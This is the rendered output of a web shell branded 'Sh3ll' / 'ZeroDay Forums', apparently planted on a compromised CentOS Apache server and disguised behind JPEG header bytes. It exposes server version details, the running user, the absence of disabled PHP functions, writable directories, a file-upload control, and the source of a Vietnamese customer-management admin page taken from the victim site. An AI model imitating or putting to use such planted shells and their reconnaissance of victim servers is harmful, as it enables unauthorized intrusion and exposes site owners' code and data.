����JFIF��� ( %"1"%)+...383,7(-.- 404 Not Found
Sh3ll
OdayForums


Server : Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.4.20
System : Linux st2.domain.com 3.10.0-1127.10.1.el7.x86_64 #1 SMP Wed Jun 3 14:28:03 UTC 2020 x86_64
User : apache ( 48)
PHP Version : 7.4.20
Disable Function : NONE
Directory :  /var/www/html/admin.adimi/code/management/customer/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : //var/www/html/admin.adimi/code/management/customer/index.php
<?php
//begin 8-11-2021
$CORE->page_title='Quản lý khách hàng';
$type='list';
if(isset($CORE->input['type']) && $CORE->input['type']!=''){
    $type=$CORE->input['type'];
}
switch ($type){
    default:
        include 'list.php';
        break;
    case 'post':
        include 'post.php';
    break;
    case 'delete':
        include 'delete.php';
        break;
    case 'list_search_customer':
        include 'list_search_customer.php';
        break;
    case 'update_nhatky':
        include 'update_nhatky.php';
        break;
    case 'baogia':
        include 'baogia.php';
        break;
    case 'print_baogia':
        include 'print_baogia.php';
        break;
    case 'del_item':
        include 'del_item.php';
        break;
    case 'upload_template':
        include 'upload_template.php';
        break;
    case 'delete_template':
        include 'delete_template.php';
        break;
    case 'send_baogia':
        include 'send_baogia.php';
        break;
    case 'sent_baogia':
        include 'sent_baogia.php';
        break;
    case 'draft_baogia':
        include 'draft_baogia.php';
        break;
    case 'delete_baogia':
        include 'delete_baogia.php';
        break;

}
include ROOT_PATH . 'include/block/header.php';
?>

<div class="content-wrapper">
    <!-- Content Header (Page header) -->
    <section class="content-header">
        <div class="container-fluid">
            <div class="row">
                <div class="col-sm-12">
                    <ol class="breadcrumb float-sm-right">
                        <li class="breadcrumb-item"><a href="?">Home</a></li>
                        <li class="breadcrumb-item active"><a href="?act=management&code=customer&type=list">Khách hàng</a></li>
                    </ol>
                </div>
            </div>
        </div><!-- /.container-fluid -->
    </section>

    <!-- Main content -->
    <section class="content">
        <div class="container-fluid">
            <div class="row">
                <div class="col-md-12">
                    <!--<ul class="nav nav-tabs">
                        <li class="nav-item">
                            <a class="nav-link active" href="?act=management&code=customer&type=list">Khách hàng</a>
                        </li>
                        <li class="nav-item">
                            <a class="nav-link" href="?act=management&code=customer&type=service">Dịch vụ khách hàng</a>
                        </li>
                    </ul>-->
                    <?php
                    if($type=='list') {
                        include 'list_tpl.php';
                    }
                    if($type=='post') {
                        include 'post_tpl.php';
                    }
                    if($type=='baogia') {
                        include 'baogia_tpl.php';
                    }
                    if($type=='print_baogia') {
                        include 'print_baogia_tpl.php';
                    }
                    if($type=='send_baogia') {
                        include 'send_baogia_tpl.php';
                    }
                    if($type=='sent_baogia') {
                        include 'sent_baogia_tpl.php';
                    }
                    if($type=='draft_baogia') {
                        include 'draft_baogia_tpl.php';
                    }

                    ?>
                </div>
            </div>
        </div><!-- /.container-fluid -->
    </section>
    <!-- /.content -->
</div>
<?php
if(isset($txt_list_nhatky) && $txt_list_nhatky!=''){
    echo $txt_list_nhatky;
}
?>
<script>
    $('.update_form_nhatky').click(function (){
        var customer_id = $(this).val();
        $('#nhat_ky_res_'+customer_id).html('<div class="spinner-border text-primary" role="status"><span class="sr-only">Loading...</span></div>');
        $.ajax({
            type: "POST",
            url: 'index.php?act=management&code=customer&type=update_nhatky',
            data: $("#form_nhatky_"+customer_id).serialize(),
            success: function(data) {
                $('.bd-example-modal-lg-'+customer_id).modal('hide');
                $('#nhat_ky_res_'+customer_id).html(data);
            }
        });
    });
</script>
<?php
include ROOT_PATH . 'include/block/footer.php';
?>

ZeroDay Forums Mini